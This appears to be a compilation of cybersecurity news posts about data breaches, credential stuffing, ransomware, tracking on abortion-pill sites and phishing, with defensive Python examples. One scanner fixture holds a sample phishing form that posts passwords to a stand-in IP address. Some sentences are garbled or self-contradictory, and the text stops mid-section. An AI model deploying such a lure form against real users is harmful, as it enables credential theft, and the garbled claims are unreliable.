
Source Code & Private Data Stolen From GoTo

GoTo, the parent company of LastPass, has disclosed that hackers recently broke into its systems and seized encrypted backups belonging to users. It claimed that in addition to LastPass user data, hackers managed to obtain data from its other enterprise products.

A data breach including the theft of source code and confidential technical information was announced by GoTo affiliate LastPass in August of last year. GoTo acknowledged being impacted by the attack in November, which was connected to an unidentified third-party cloud security vendor.

Paddy Srinivasan, chief executive of GoTo, revealed that the security breach was more severe than initially suspected and involved the theft of account usernames, salted and hashed passwords, a portion of the Multi-Factor Authentication (MFA) settings, and some product settings and license data.

Despite the delay, GoTo did not offer any remediation assistance or guidance for the impacted customers. According to GoTo, the company does not store its clients' credit card or bank information or collect personal data such as dates of birth, addresses, or Social Security numbers. Contrast that with the incident that affected its subsidiary, LastPass, in which hackers grabbed the contents of users' encrypted password vaults along with their names, email addresses, phone numbers, and payment information.

LastPass' response to the leak was ripped apart by cybersecurity experts, who charged the firm with being opaque about the gravity of the situation and with failing to stop the hack. To provide more reliable authentication and login security, GoTo is also migrating its accounts to an improved Identity Management Platform.

The number of impacted consumers was not disclosed by GoTo. Jen Mathews, director of public relations at GoTo, claimed that the company has 800,000 clients, including businesses, but she declined to address other queries.

Ahead of Data Privacy Day, Here are Best Password Practices to Safeguard Yourself

 

This week is Data Privacy Day, a day dedicated to raising awareness about how to protect your data and information online. The risks associated with the collection, processing, and storage of personal data are increasing, both on an individual and corporate level. 

Even today, most people are unsure how to respond when their rights are violated as a result of a data breach or leak. Keeper Security is sharing password best practices in order to keep accounts and data safe from threat actors. The goal is to educate consumers and businesses about privacy and to assist them in protecting themselves from the growing threat of data breaches.

Even when so-called passwordless options such as biometrics are used, the security of an individual's identity, data, and online accounts is heavily reliant on the strength of their passwords. Individuals must understand the difference between weak and strong passwords, especially since a breach could affect the organization for which they work, causing millions of dollars in damages. Data shows that stolen or weak passwords are responsible for 81% of hacking-related data breaches.

"Data Privacy Day provides an opportunity to elevate the critical importance of cybersecurity in all of our lives. The digital transformation shows no signs of slowing down, and with ever more connected devices from smartphones to smart fridges, we must all take concrete steps to protect ourselves," said Darren Guccione, CEO and Co-founder at Keeper Security.

He further added, "it is imperative everyone utilize strong and unique passwords for all of their accounts and store those passwords in a secure, encrypted vault to reduce their risk of an attack. The existential reality is that anyone can become a victim of cybercrime."

Think before you share, open, or click

One critical step to online safety is to avoid sharing personal information with anyone unless absolutely necessary. Keep an eye out for links in emails from suspicious or unknown senders, and learn how to spot phishing attempts. Download attachments only when you are certain they are safe.

Because it is human nature to believe what we see, aesthetics and user interface frequently trick users into clicking on a malicious, incorrect URL. The important thing is to make sure the URL matches the authentic website. When a password manager is used, it detects when the URL of a site does not match what is in the user's vault. This is an essential tool for preventing the most common types of attacks, such as phishing scams.
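The URL check described above is worth seeing in code. The following is an added example written for this post, not Keeper's or any other vendor's implementation: it models how a password manager decides whether a saved credential may be filled into a page, comparing the registrable domain of the vault entry with that of the page rather than trusting what the address bar appears to show. The hostnames (bank.example, evil.test), the tiny PUBLIC_SUFFIXES set, and the matching rules are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Constructed subset of the Public Suffix List, enough for this example; a real
# password manager would load the full list.
PUBLIC_SUFFIXES = {"co.uk", "com.au", "co.jp"}


def hostname_of(url: str) -> str:
    """Normalised hostname of a URL: lower-case, trailing dot removed, '' if absent.
    urlsplit() takes the host from after any '@', so 'https://bank.example@evil.test/'
    yields 'evil.test', not the decoy that appears first in the address bar."""
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def registrable_domain(host: str) -> str:
    """The 'site' a credential belongs to: the label just above the public suffix.
    login.bank.example -> bank.example; accounts.shop.co.uk -> shop.co.uk."""
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in PUBLIC_SUFFIXES:
        return ".".join(labels[-3:])
    if len(labels) >= 2:
        return ".".join(labels[-2:])
    return host


def autofill_allowed(vault_url: str, page_url: str) -> bool:
    """Return True only if a credential saved for vault_url may be filled on page_url.
    Rules (an assumption of this example, modelled on common manager behaviour):
      * both URLs must carry a hostname;
      * a credential saved for an https site is never filled into a plain-http page;
      * the page must belong to the same registrable domain as the saved entry.
    Lookalike hosts (bank-example.com, bank.example.evil.test) therefore get nothing,
    which is the phishing defence the text describes."""
    saved_host, page_host = hostname_of(vault_url), hostname_of(page_url)
    if not saved_host or not page_host:
        return False
    if urlsplit(vault_url).scheme == "https" and urlsplit(page_url).scheme != "https":
        return False
    return registrable_domain(saved_host) == registrable_domain(page_host)


if __name__ == "__main__":
    saved = "https://login.bank.example/signin"
    for candidate in ("https://www.bank.example/account",
                      "https://bank-example.com/signin",
                      "https://login.bank.example.evil.test/signin",
                      "https://login.bank.example@evil.test/signin",
                      "http://login.bank.example/signin"):
        verdict = "fill" if autofill_allowed(saved, candidate) else "REFUSE"
        print(f"{candidate:48} -> {verdict}")
```

The point of matching on the registrable domain rather than the full host is that a user who saved a credential on login.bank.example should still get it on www.bank.example, while bank.example.evil.test, whose registrable domain is evil.test, is refused no matter how closely it imitates the real site.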

Improve your password habits by doing the following:
  • Do not use any easy-to-guess character combinations.
  • Avoid using the same password for multiple accounts, and do not include any personal information in a password.
  • Keyboard patterns and short passwords should also be avoided.
  • Avoid using repeated letters or numbers as a password.
  • Use long combinations of letters, symbols, and numbers instead.
  • Create a memorable phrase, called a passphrase, by randomly replacing certain letters with numbers or symbols.
  • Create mnemonic passwords, for example ones based on significant events.
Using a secure password manager is the best way for online users to protect their passwords. With an effective password manager, individuals can generate random character combinations for their passwords and save them in a password vault. Users no longer need to write passwords down or memorize them, habits that make them more vulnerable to breaches.

A password manager built on zero-trust and zero-knowledge principles creates an even more secure environment for users to store their passwords. Even in the worst-case scenario of a breach, the stored data exists only as ciphertext, which cannot be accessed or read by a human or machine without the user's key.

PayPal Users Should Check Their Accounts

 


It seems that scammers never cease trying to con people. Keeping customers' information private and secure is of the utmost importance to companies, so they use many ways to protect against a breach in their network. 

Despite these digital blockades, hackers have tried to figure out ways to get around them. As the world learns more about the use of technology, the methods criminals employ to commit theft are also improving. 

Until a few years ago, banks and credit card companies were plagued by much more serious issues related to ID theft than they are today. 

There is the potential for a data breach to occur at any time. Banks and credit card companies must comply with higher standards of data security than companies in the private sector.  

A company can take all the necessary steps to safeguard the data of its customers and employees, yet login and password restrictions remain one of the most annoying things customers face when using its services. If you are concerned about the security of your personal information, one of the most effective measures is not to use your e-mail address as your login username.

Customers who do so are even more vulnerable to hacking attempts. To keep your password secure, you should never reuse it. When the company's login portal tells you that you cannot use a password you have used in the past, that rule is intended to protect you, not to annoy you, frustrating as it can be.

This message appears whenever you try to reuse a password on the company's portal, because reusing passwords puts you at risk from hackers. Despite the inconvenience of having a unique login and password, it is better to do so than to face the consequences of identity theft or other financial scams.

The PayPal System Has Not Been Hacked

There is no need for you to panic, even though the headlines may lead you to believe PayPal has been hacked. The company's network has not been compromised. The fraud was a credential-stuffing attack: hackers try many combinations of logins, aided by password-guessing techniques, until they find the genuine ones. In other words, it is a kind of onslaught against the network's front door, but it does not break the system that protects the company's information and assets. A scammer obtains usernames from other companies that may not be as secure as the targeted company and cross-checks those usernames against it.

A house-cleaning company that lets customers set up a login username and password will not have the same kind of data protection as PayPal (PYPL), which was designed with robust protection for its users and data. Hackers have a much higher chance of breaking into the less secure company's network, and when the same login username is used on both PayPal and the cleaning company's customer portal, what is stolen from one can be tried against the other.

In this way, the hacker gains access to passwords. Hackers use the data they collect to break into broader, better-protected networks; access to this kind of data gives them more opportunities to break into other websites and steal their data.

A unique username and password is only one hurdle scammers must overcome to gain access to an account on the site. Two-factor authentication does not guarantee that crooks cannot get through, but at least it slows them down. About 35,000 PayPal accounts were hacked by these scammers in December after they acquired authentic usernames for the accounts.
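The credential-stuffing pattern described in this section has a recognisable signature in authentication logs: one source address tries many different usernames in a short time, almost all of them failing, with the occasional success marking an account that has just been taken over. The detector below is an added example written for this post, not PayPal's own tooling; the log line format, the source addresses (RFC 5737 documentation ranges) and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed authentication log (not real PayPal data): one line per login attempt.
SAMPLE_LOG = """\
2022-12-06T03:12:01Z ip=203.0.113.5 user=alice result=FAIL
2022-12-06T03:12:02Z ip=203.0.113.5 user=bob result=FAIL
2022-12-06T03:12:02Z ip=203.0.113.5 user=carol result=OK
2022-12-06T03:12:03Z ip=203.0.113.5 user=dave result=FAIL
2022-12-06T03:12:03Z ip=203.0.113.5 user=erin result=FAIL
2022-12-06T03:12:04Z ip=203.0.113.5 user=frank result=FAIL
2022-12-06T03:12:04Z ip=203.0.113.5 user=grace result=FAIL
2022-12-06T03:12:05Z ip=203.0.113.5 user=heidi result=FAIL
2022-12-06T08:45:10Z ip=198.51.100.9 user=alice result=FAIL
2022-12-06T08:45:31Z ip=198.51.100.9 user=alice result=FAIL
2022-12-06T08:46:02Z ip=198.51.100.9 user=alice result=OK
this line is malformed and must be skipped
2022-12-06T09:00:00Z ip=192.0.2.77 user=dave result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_auth_log(lines):
    """Yield one dict per well-formed line; malformed lines are skipped, not fatal."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def credential_stuffing_sources(lines, min_users=5, min_fail_ratio=0.8):
    """Flag source IPs whose behaviour matches credential stuffing: many distinct
    usernames tried from one address with a high failure rate. The thresholds are
    assumptions for this example; tune them to the service's normal traffic.
    The result includes the accounts where the flagged source did log in
    successfully, i.e. the customers that need a forced reset and a notification."""
    stats = defaultdict(lambda: {"users": set(), "attempts": 0, "failures": 0, "hits": set()})
    for rec in parse_auth_log(lines):
        s = stats[rec["ip"]]
        s["users"].add(rec["user"])
        s["attempts"] += 1
        if rec["result"] == "FAIL":
            s["failures"] += 1
        else:
            s["hits"].add(rec["user"])

    flagged = {}
    for ip, s in stats.items():
        fail_ratio = s["failures"] / s["attempts"]
        if len(s["users"]) >= min_users and fail_ratio >= min_fail_ratio:
            flagged[ip] = {
                "distinct_users": len(s["users"]),
                "attempts": s["attempts"],
                "fail_ratio": fail_ratio,
                "compromised_accounts": sorted(s["hits"]),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in credential_stuffing_sources(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

The second address in the sample, which fails twice on a single account and then succeeds, is what a legitimate user mistyping a password looks like, and the distinct-user threshold keeps it out of the report. Mass password resets for the accounts in `compromised_accounts`, plus a notification like the one PayPal sent, is the natural follow-up action.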

PayPal Can Assist in Repairing Breached Accounts  

As a result of this latest credential-stuffing attack, PayPal has contacted 34,942 customers whose accounts were compromised. In that notice, customers learned how to better protect themselves and their accounts against cyberattacks now and in the future. Sometime between the 6th and the 8th of December last month, PayPal's customer accounts were compromised by an attacker. There was no notice of the breach until mid-December.

It is also imperative for customers to use unique usernames and passwords for all of their online accounts to help protect themselves and their accounts. While maintaining original passwords and usernames is time-consuming and sometimes inconvenient, it is also one of the easiest and most cost-effective ways to protect an individual's digital identity and personal information. As reported by CNET, PayPal has also offered affected accounts two years of free identity theft monitoring through Equifax.

After a Vendor Hack, FanDuel Warns of a Data Breach

 


A security breach has been detected at FanDuel's sportsbook and betting site, which exposed customers' names, email addresses, and payment information. This occurred in January 2023, when MailChimp's security was breached. A security advisory urges users to be wary of phishing emails and stay vigilant against them. 

An employee's credentials were stolen by hackers using a social engineering attack on MailChimp's website on January 13th, according to an announcement from the company. 

To steal the "audience data" of 133 users, the threat actors used these credentials to log in to an internal MailChimp tool and access customer support and administration information. 

Note that the audience data differs from one MailChimp customer to another. Generally, however, it contains the names and email addresses of customers, or potential customers, who receive marketing emails about the products and services they are interested in.

Following the MailChimp breach, FanDuel sent an email to its customers last Thursday informing them that they were affected by a cyberattack carried out by threat actors.

FanDuel's notice, titled 'Notice of Third-Party Vendor Security Incident,' says that an outside technology vendor that sends transactional emails on behalf of its clients, including FanDuel, informed the company that it had recently experienced a security breach within its system that affected several of its clients.

FanDuel's vendor confirmed on Sunday evening that unauthorized individuals gained access to the names and email addresses of customers registered on FanDuel's site. No passwords for individual accounts or financial information were leaked in this incident. 

According to FanDuel, the breach was not a breach of their servers or the personal information of FanDuel users, and the hackers did not acquire any "passwords, financial account information, or other sensitive information" as a result of the breach. 

Even though the notification did not specify which third-party vendor had been breached, FanDuel confirmed to BleepingComputer that MailChimp was the source of the breach.

As a result of the recent data breach affecting FanDuel, the company is encouraging its customers to "remain vigilant" against phishing attacks and attempts to take over their accounts.

A FanDuel security incident email warns, "Be aware that emails that claim to be from FanDuel may pose a problem with your account that requires you to provide unique or personal information to resolve it." People should remain vigilant against email "phishing" attempts. 

FanDuel states that it never sends direct emails to customers asking for personal information to resolve an account issue.

As well as reminding customers of the importance of updating their passwords frequently, FanDuel wants customers to enable multi-factor authentication (MFA) on their accounts and to avoid clicking on links in password reset emails that they did not request themselves.

The stolen MailChimp data has not yet been used in an attack. There are no indications that it will be used in such an attack. However, in the past, malicious actors have abused this type of stolen data in phishing attacks. 

There was a security breach of MailChimp in April 2022, which led to threat actors stealing marketing email data for the Trezor smart wallet, a hardware wallet.  

That data was then used in a phishing campaign to steal cryptocurrency wallets: the campaign used fake data breach notifications to trick recipients into installing malicious software.

Furthermore, FanDuel accounts are increasingly becoming a target of credential stuffing attacks, with threat actors actively targeting the account of customers through this method [1,2,3]. 

A cybercrime marketplace can sell these accounts for as little as $2 or as much as $7. This depends on the account's balance or the payment information it has been linked to. 

Enabling multi-factor authentication with an authentication app on your FanDuel account makes the account much more difficult to steal. This remains true even if an attacker manages to obtain the customer's credentials.

In many account compromises, login credentials stolen from one site are used to break into the user's account on another site, after which the user's data is stolen. Once these credentials have been obtained, a threat actor uses them to log into other websites and access the associated accounts.

For this reason, you should use a password manager to store all your passwords. You should also create a unique password for every site where you log in. This will ensure that a breach on one website does not affect you on another.

LAUSD Computers are Breached via Cybercriminals

According to Los Angeles Unified School District (LAUSD), the second-largest school district in the U.S., the Vice Society ransomware group has stolen files containing private information, including Social Security Numbers (SSNs), belonging to contractors.

Additionally, LAUSD disclosed that the threat actors were present on its network for more than two months, from July 31 to September 3, 2022. Before distributing the stolen material, the group told BleepingComputer that it had stolen 500 GB of data from the school district's systems, but it offered no supporting documentation.

LAUSD is offering contractors and their staff members a free year of Experian's IdentityWorks service, which aids in detecting misuse of personal information. The FBI, CISA, and MS-ISAC jointly released an advisory warning of Vice Society's heavy targeting of the U.S. education sector on the day LAUSD reported the ransomware attack. The hackers responded to L.A. Unified's refusal to pay a ransom by publishing the data they obtained on the dark web, where other nefarious characters may use it for identity theft.

After the school district declared that it would not comply with the cybercriminals' ransom demands, saying the money was better spent on its students and their education, the ransomware group released the data stolen from LAUSD.

Data theft is only one aspect of such an operation. The second step is encrypting computer systems so that users cannot access them and daily business becomes impossible. The hackers managed to encrypt systems in the district's facilities division, which made basic tasks such as classroom instruction and record-keeping more challenging for approximately two weeks. Schools never had to close temporarily, as has happened elsewhere when other school systems were targeted.

The revelation in the notice came as no surprise to cybersecurity professionals, who had anticipated that an examination would show the intrusion started earlier than initially reported. Officials from the school district did not disclose the number of potential victims. When more than 500 California residents are affected, the threshold that triggers public notification, a notice letter must be filed with the state attorney general in addition to notifying the victims.

Cyber Thieves Target Retirement Accounts


Data security has become a priority for tax returns, credit cards, and other conventional targets of cyber criminals. Online thieves have recently been targeting employer retirement plans and the accounts in the plans. 

Data security at retirement plans varies, and there are numerous ways to breach it. Cybercriminals seek to exploit each plan's weakest link. 

In one instance, a retiree at a large employer recently discovered that his monthly pension cheque had not been deposited on time. He got in touch with the retirement plan administrator, who, after some investigation, discovered that the bank account specified for the payment had been altered.

The retiree had not altered the account. Instead, the request had been made by an unidentified party, and a plan employee processed the change request because it appeared relevant and accurate.

Fortunately, neither the retiree nor the plan lost money. The payments were stopped promptly, and the retirement account was changed from a payment method back to a depository. After a brief investigation, the plan administrator found that change requests had been made for several other retirees, all of them redirecting payments to the same bank account.

By monitoring his accounts carefully and noticing that his monthly payment had not been deposited on the usual day of the month, this retiree avoided becoming a victim of cybercrime. He also got in touch with the administrator right away to make sure the modification did not take effect.

Methods Used by Hackers 

There are several methods used by threat actors in order to steal from retirement plans and accounts. 

  • One tactic is the conventional method of gaining access to an email system. Cybercriminals may also use "phishing" emails to deceive an employee or retiree into exposing access information.

Phishing attacks generally include threat actors sending an email to the target key employee or retiree and posing as a legitimate corporate employee (often a high-level executive) or a third-party vendor. 

The fraudulent email asks for specific information and, in the case of several employees or retirees, may request a list of personal information. Sensitive information can be given to criminals via email if the recipient is not watchful. 

  • Another method used by cybercriminals is purchasing personal details about the retirement account owners via the dark web and utilizing the data in order to access the retirement account. 

Whatever the method, once cyber thieves have the data, they can use it to log into the account of a retiree or employee and reroute payments or disbursements.

How to Protect Yourself 

  • One way to secure your data is to make yourself aware of the retirement plan's security measures, in particular how it verifies the validity of each request for an account change. How does the plan verify the identity of the person making the request? Is two-factor authentication used before an account can be accessed or changed online? Of course, none of these data security precautions are effective if online criminals submit modification requests on paper. So, after confirming how the accuracy of the information on a paper request is checked, ask whether the plan administrator takes any further verification steps.
  • Setting up your own personal cyber security procedures is another strategy to safeguard yourself. According to security professionals, much of the average user's personal data is already for sale on the dark web, which makes it important to keep the remaining information as secure as possible. This means following precautions such as not sharing your Social Security number and other important information unless it is necessary.
  • Check your accounts on a regular basis. If a deposit is due on a certain day, make sure it has been made by checking your accounts around that time each month. Contact the plan administrator if the deposit has not been made.
  • Moreover, log in to your account to monitor for any suspicious activity. Look for unauthorized changes and transactions, and make sure that your address, beneficiary, and other details have not been changed.

37 Million Accounts' Data were Stolen from T-Mobile in a Data Breach Involving APIs

 

T-Mobile, a wireless provider in the United States, reported earlier this week that an unidentified malicious intruder broke into its network in late November and stole information on 37 million customers, including addresses, phone numbers, and dates of birth. 

The breach was found Jan. 5, according to T-Mobile, which disclosed this in a filing with the U.S. Securities and Exchange Commission. According to the company's investigation to date, the stolen data didn't include passwords or PINs, bank account or credit card information, Social Security numbers, or other official identifications. 

The malicious activity "appears to be fully contained at this time, but our investigation is still ongoing," T-Mobile said, adding that the data was first accessed on or around Nov. 25.

In recent years, the company has experienced numerous hacks. In its filing, T-Mobile stated that it did not anticipate the most recent breach to materially affect its business.

However, Neil Mack, a senior analyst at Moody's Investors Service, stated in a statement that the breach raises concerns about management's cyber governance, may alienate customers, and may draw the attention of the Federal Communications Commission and other regulators. 

The frequency of these cybersecurity incidents at T-Mobile is alarmingly high compared to that of its telecom competitors, Mack said, even though they may not be systemic in nature. 

T-Mobile announced in August 2021 that personal information including Social Security numbers and driver's licence information had been stolen. As a result, the company agreed to pay $350 million to customers who brought a class action lawsuit. There were almost 80 million affected Americans. 

Additionally, it announced at the time that it would invest $150 million in other technologies and data security through 2023. Prior to the August 2021 intrusion, the company disclosed breaches in which customer information was accessed in January 2021, November 2019 and August 2018. 

After acquiring rival Sprint in 2020, Bellevue, Washington-based T-Mobile rose to prominence as one of the nation's major providers of mobile services. After the merger, it claimed to have more than 102 million clients.

Google Receives Sensitive Data From Abortion Pill Websites

 


Several online pharmacies are selling abortion pills online and sharing their customers' personal information, such as their search history and geolocation, with Google and other third parties. ProPublica has learned that by using this information, one can identify the users of these websites, which could be used to track them down. 

In post-Roe America, this type of private information could prove downright dangerous if law enforcement subpoenas such sensitive data to prosecute women who wish to end their pregnancies, a concern that goes beyond the usual worries of data privacy advocates.

Police often do not even need to go through the courts to compel businesses to hand over this data, because executives frequently hand it over willingly and without a court order.

In the aftermath of the Supreme Court's ruling in Dobbs, which overturned Roe v. Wade and ended the constitutional right to abortion, more than a dozen states now prohibit both surgical abortion and medication abortion (the latter also known as abortion pills) within their borders.

ProPublica analyzed the pharmacies' websites with The Markup's website privacy inspector to find out which types of trackers they use and why. The report found that at least nine websites selling abortion medication also collected and shared records about their customers, including other websites they visited, search terms entered, general location, and general device information.

It is essentially the website's actual visitor data that is shared with online tools that enable websites to track visitor numbers and traffic patterns. These tools enable websites to provide live chat support and do other helpful things with the information. 

According to ProPublica's investigation, nine of the sites are sending Google data that could potentially identify users, including random numbers associated with each user's browser, which could then be matched with other information acquired through the sites, the investigative non-profit documented.

In total, there are nine pharmacies available for abortion-related services, including Abortion Ease, BestAbortionPill.com, PrivacyPillRX, PillsOnlineRX, Secure Abortion Pills, AbortionRx, Generic Abortion Pills, Abortion Privacy, and Online Abortion Pill Rx. 

The Register contacted several pharmacies about the issue, but no one responded. Companies dealing with abortion pills must stop sharing data with Google and Facebook immediately, said Cooper Quintin, Senior Staff Technologist at the Electronic Frontier Foundation (EFF).  

Web developers may not have thought they were placing their users at risk when they used Google Analytics and third-party tracking, but they now have to consider that risk. In the current political climate, all websites, but especially those that serve at-risk users, must consider whether assisting Google, Facebook, and others in building user profiles could lead to an extremely horrific outcome, Quintin said. They cannot continue acting as though Roe is still the law of the land.

It is worth noting that the EFF has not yet witnessed any instance where law enforcement agencies have used this type of information to prosecute abortion seekers or providers. Quintin is concerned, however, that someday the data stored on big tech platforms such as Google and Facebook may be used as a dragnet tool to search for women seeking abortions or other reproductive care services and prosecute them.

If served with a court order, a tech company will typically turn over its users' private information and messages to the police. Google alone received more than 87,000 search warrants and subpoenas in 2021.

'Purely Hypothetical and Technically Impossible,' States Google

Google does not specify in its report whether any of these requests related to health information. According to a company spokesperson, the search giant is not afraid to push back against government demands to turn over customer data.

Google Analytics customers are also prohibited from uploading to Google any information that might give away a person's identity. Moreover, Google has strongly disputed the non-profit organization's conclusions.

According to Google Analytics Product Director Steve Ganem, the allegations described in ProPublica's latest article regarding Google Analytics are purely hypothetical. They are technically impossible in the real world. 

As Ganem noted, "Google Analytics was designed specifically so that we and other third parties, including law enforcement, would be unable to identify users through Google, possibly under some circumstances." As well as that, Google also has strict policies against advertising to people who provide sensitive information on their website. 

Last year, Google promised to update the system used to track where users are located. This will ensure that trips to medical clinics and other sensitive places are automatically excluded.   

Bogus DHL Emails Enable Attackers to Hack Microsoft 365 Accounts

 

As per experts, a new phishing campaign has been discovered that impersonates logistics giant DHL in order to steal Microsoft 365 credentials from victims in the education industry. Cybersecurity researchers from Armorblox recently found a significant phishing campaign, with more than 10,000 emails sent to inboxes connected to a "private education institution". 

The email is designed to appear to be from DHL, with the company branding and tone of voice one would expect from the shipping giant. The recipient is informed in the email titled "DHL Shipping Document/Invoice Receipt" that a customer sent a parcel to the incorrect address and that the correct delivery address must be provided.

False login prompt
The email apparently includes an attachment, labeled "Shipping Document Invoice Receipt," which, when opened, appears to be a blurred-out preview of a Microsoft Excel file.

A Microsoft login page appears over the blurred-out document, attempting to deceive people into believing they must log into their Microsoft 365 accounts in order to view the file's contents. If the victims provide the login credentials, they will be sent directly to the attackers.

Armorblox explained, “The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”

Businesses can safeguard themselves against phishing attacks by training their employees to recognize red flags in their inboxes, such as the sender's email address, typos and spelling errors, a feeling of urgency (legitimate emails almost never require the user to respond urgently), and unexpected links/attachments.

According to the researchers, the attackers used a valid domain to avoid Microsoft's email authentication checks.
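The bypass described above (no URL in the message body, a credential form carried inside an HTML attachment) is something a mail gateway can check for directly. The scanner below is an added example, not Armorblox's or Microsoft's code; the scoring thresholds and the two sample attachments are constructed.

```python
"""Score e-mail HTML attachments for an embedded credential-harvesting form.

URL reputation has nothing to fire on when the lure carries no link, so
this check parses each HTML attachment itself and looks for the signals
such attachments share: a form that asks for a password, where that form
posts, and inline script next to it.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect every <form> and note whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []          # one dict per <form>: action, has_password
        self.has_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "has_password": False})
        elif tag == "input" and self.forms and a.get("type", "").lower() == "password":
            self.forms[-1]["has_password"] = True
        elif tag == "script":
            self.has_script = True


def score_html_attachment(html_text, quarantine_at=2):
    """Return (score, reasons, quarantine).

    Scoring (assumed thresholds, tune to your own mail flow):
      +2  a form that asks for a password: an attachment has no business
          hosting a login form at all
      +1  where that form posts: an external host, or no absolute action
          (meaning the post is script-driven)
      +1  inline script present alongside a form
    """
    scanner = _FormScanner()
    scanner.feed(html_text)
    score, reasons = 0, []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        score += 2
        reasons.append("attachment contains a password form")
        host = urlparse(form["action"]).hostname
        if host is None:
            score += 1
            reasons.append("password form has no absolute action (script-driven post)")
        else:
            score += 1
            reasons.append(f"password form posts to external host {host}")
    if scanner.has_script and scanner.forms:
        score += 1
        reasons.append("inline script alongside a form")
    return score, reasons, score >= quarantine_at


# Constructed sample attachments (not real campaign artefacts).
BENIGN_INVOICE = """<html><body><h1>Invoice 1234</h1>
<table><tr><td>Item</td><td>Qty</td></tr><tr><td>Widget</td><td>2</td></tr></table>
</body></html>"""

LURE_WITH_FORM = """<html><body><p>Document preview</p>
<form method="post" action="https://203.0.113.5/collect">
<input type="email" name="u"><input type="password" name="p"><button>Sign in</button>
</form><script>document.forms[0].onsubmit = function () {};</script></body></html>"""
```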

Synthetic Identity Fraud: What Is It?

Frankenstein ID, the use of fake identities by scammers, has become prevalent over the last 12 to 18 months, with US financial institutions (FIs) reporting losses of $20 billion in 2021 as compared to $6 billion in 2016.

When a Social Security number is stolen, synthetic identity fraud occurs. Hackers then use it in conjunction with bits of accurate personal data obtained from various sources or entirely false information to build an identity in order to commit theft.

Synthetic identity theft is largely unknown to the public, which allows fraudsters to carry out their crimes undetected. Researchers discovered that two out of every three American adults were largely unaware of synthetic identity theft.

What is the Frequency of Child Identity Theft and Fraud?

In contrast to adults, stealing the identities of minors gives hackers a wider window to utilize the credentials since the majority of victims who had their identities taken as children do not become aware of the fraud until they are adults. Social media, personal health information, and school forms pose the greatest threats to data theft involving minors, which is a concern for nearly two-thirds of adults. 

SSNs can be found by hackers in different spots, like your email account or the database of your chosen merchant. Even student data is stolen and published on the dark web by ransomware groups. Hackers take SSNs to commit synthetic ID theft. As they are more likely to belong to minors, they favor numbers that were granted within the last 18 years. Children generally wait until they are 18 to apply for loans or credit, giving criminals ten or even fifteen years to cause havoc before anyone takes notice.

A hacker who holds a Social Security number will start applying for credit online. Simply applying for credit builds a credit history, and a creditor will eventually grant a $500 or perhaps $1,000 credit line. The breakout comes once the hackers have access to $10,000 to $15,000 in credit: after a final flurry of charges, they disappear.

86% of parents do not check their kids' credit, so hackers can ruin it for years. As a result, synthetic identity fraud has severe repercussions that frequently prevent its young victims from starting their adult lives. The fact that children have no control over their credit or financial information makes them vulnerable as well.


Gen Digital Customers' Accounts were Breached by Hackers



A Norton LifeLock spokesperson has confirmed that malicious third parties are likely to have gained access to some customers' accounts, possibly even gaining access to their password vaults. 

The document describing affected customers' rights as a result of a data breach is available on the website of the Vermont attorney general's office. Using username and password login combinations, the report suggests hackers may have been able to access the accounts of Norton and Norton Password Manager users. 

According to the vendor, which is owned by Gen Digital, the login information was not obtained by breaching the company's own IT environment; it came from a breach elsewhere.

Gen Digital Inc. is a publicly traded company and one of the leading makers of consumer antivirus software. It was formed more than a year ago, in September, through the merger of Norton LifeLock Inc. and Avast plc. In addition to antivirus software, Gen Digital sells other cybersecurity products, including password managers and virtual private network tools.

A report regarding the breach of some Gen Digital accounts emerged on Friday, indicating that some customers' accounts had been compromised. According to a statement released by the company the next day, it had "secured 925,000 inactive and active accounts that may have been targeted" by hackers during the attack. TechCrunch reported earlier this week that the accounts of 6,450 customers had been compromised as a result of the breach. 

In their attempt to break into Gen Digital's customer database, hackers may have accessed the names, telephone numbers, and mailing addresses of a large number of customers. The company also discovered that some of the data stored in Norton Password Manager, its password management program, may have been compromised, and says it is possible that the hackers were able to access the login credentials that affected users kept there.

It has also been reported that Gen Digital's own systems were not affected by the breach and that no data was compromised from them. Hackers allegedly gained access to customer accounts through credential stuffing, a type of cyberattack in which attackers reuse login credentials stolen from another company to break into the same users' accounts at an unrelated service.

The company's systems were not compromised and remain safe and operational. However, it is all too common today for threat actors to take credentials found elsewhere, such as on the dark web, and use them in automated attacks to gain access to unrelated accounts, a company spokesperson said.

It was Gen Digital that first recognized the breach on December 12 after discovering an unusually high number of failed login attempts that were aimed at its customers' accounts. Earlier this month, the company identified the lack of security measures by which hackers were able to gain access to customer accounts. 

Gen Digital notified the affected customers and reset their passwords as soon as it discovered the breach. The company also says "additional security measures" have been implemented to protect customers.

Earlier this month, LastPass US LLP, one of Gen Digital's major competitors in the password manager market, suffered a security breach of its own, which coincided with the launch of Gen Digital. It followed an earlier cyberattack in August in which technical information was stolen; hackers then used that information to access LastPass' cloud storage environment.

During the hacking operation, hackers gained access to the usernames and billing addresses of customers. A backup copy of LastPass' password manager, which is the most widely used password management tool available, was also obtained by hackers. As per the policy of the company, the encrypted copy of account information cannot be decrypted without the password of the user's account, which was not compromised.

How to Safeguard Your Data in the Era of Privacy Violations


When our information falls into the wrong hands, it can cause a lot of harm, especially since con artists frequently prey on vulnerable victims. The recent data breaches at Optus and Medibank are further evidence that fraud and scams are on the rise. According to the Attorney-General's office, identity theft, con artists, and credit card fraud cost Australians $900 million annually. There are, however, extra precautions we can take to safeguard ourselves. How? Read on.

Invest in a password manager

